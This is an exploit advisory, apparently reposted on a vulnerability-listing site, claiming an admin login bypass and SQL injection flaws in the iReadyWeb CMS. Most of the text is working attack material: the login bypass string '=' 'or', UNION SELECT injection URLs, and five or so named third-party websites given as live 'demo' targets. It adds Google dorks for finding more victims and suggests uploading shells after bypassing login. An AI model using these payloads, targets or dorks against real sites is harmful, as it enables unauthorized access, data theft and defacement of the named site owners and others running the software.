iReadyWeb version 1.x.x CMS - Multiple Vulnerabilities (SQLi - Admin Bypass)

2016.03.13
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|======================================================================= |Exploit Title: iReadyWeb version 1.x.x CMS - Multiple Vulnerabilities (SQLi - Admin Bypass) |Exploit Author: Blackwolf_Iran |Date : Sunday, March 13, 2016 |Email : blackwolf@post.com |Site : http//iranonymous.org/ |Tested on : win 10 & Linux |Vendor Home Page : http://www.ireadyweb.com/ |Version : 1.x.x |======================================================================= |{Admin Bypass Vul} |In This Vul An Attacker Can Bypass Admin Login Page And Login with Admin User | And Upload Shells Or Edit Home Page... | Admin Login : you can just type Address of site and add /webadmin/ | for example : site.com/webadmin |Site Redirect you to this page : site.com/webadmin/login.php |in this page you can bypass login : |Username : '=' 'or' |Password : '=' 'or' |--------------------- |{Demo} | 1) http://value-vac.com/webadmin/ | 2) http://pinkgluta.com/webadmin/ | 3) http://cornerstonemgmnt.com/webadmin/ | 4) http://www.kinetics.co.th/webadmin/ | 5) http://cart.uberthailand.com/webadmin/ |If You want more! you can search this DORK in GOOGLE :D |DORK : intext:"Powered by iReadyWeb.com" |======================================================================= |{SQL injection Vul} |in this vul An Attacker can Run SQL Methods :D | for exp : site.com/news.php?id=-56%27+UNION+SELECT+1,2,3,4,5,user%28%29,7,8,9,10,11,12--+ |--------------------- |{Demo} | 1) http://cart.uberthailand.com/product.php?id=-15%27+UNION+SELECT+1,2,3,4,user%28%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--+ | 2) http://www.kinetics.co.th/news.php?id=-13%27+UNION+SELECT+1,user%28%29,3,4,5,6,7,8,9,10,11,12--+ | 3) http://cornerstonemgmnt.com/project-reference.php?id=-12%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,user%28%29,13,14,15,16,17,18,19,20--+ | 4) http://pinkgluta.com/news.php?id=-56%27+UNION+SELECT+1,2,3,4,5,user%28%29,7,8,9,10,11,12--+ | 5) http://www.marianconstantine.com.au/category.php?category=4%27 |If You want more you can search this DORK in GOOGLE :D |DORK : intext:"Powered by iReadyWeb.com" inurl:id= |======================================================================= |SpC TnX To: Hacker Khan - Mr.Khatar - R4DIC4L , . |And All Of Iranian Hackers |Discovered By: Blackwolf_Iran |=======================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top